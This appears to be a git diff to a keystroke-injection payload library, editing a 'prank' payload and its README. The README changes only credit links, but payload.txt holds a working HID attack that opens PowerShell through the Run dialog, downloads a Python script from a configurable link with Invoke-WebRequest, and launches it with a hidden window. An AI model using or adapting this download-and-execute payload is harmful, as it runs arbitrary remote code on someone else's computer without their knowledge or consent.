diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md b/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md index 3a8c2069..bd37a0c5 100644 --- a/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md @@ -22,7 +22,7 @@ Opens a shell, dowloand the Python script that will prank your friends mouving t ## Credits -

Aleff :octocat:

+

Aleff

@@ -32,17 +32,11 @@ Opens a shell, dowloand the Python script that will prank your friends mouving t
Github -
- - - -
Instagram -
-
Discord +
LinkedIn
diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt index 7619d90c..f2a1be70 100644 --- a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt @@ -13,18 +13,19 @@ ATTACKMODE HID # Requirements: # - Internet Connection +# VARIABLES +# - Set your Python script link +SCRIPT-PY-LINK='example.com' + QUACK DELAY 1000 QUACK GUI r QUACK DELAY 500 QUACK STRING powershell QUACK ENTER QUACK DELAY 500 - -# REQUIRED - Set your Python script link -QUACK STRING Invoke-WebRequest -Uri \"SCRIPT-PY-LINK\" -OutFile \"script.py\" +QUACK STRING Invoke-WebRequest -Uri \"$SCRIPT-PY-LINK\" -OutFile \"script.py\" QUACK ENTER QUACK DELAY 500 - QUACK STRING Start-Process python.exe -ArgumentList \"script.py\" -WindowStyle Hidden QUACK ENTER QUACK DELAY 1000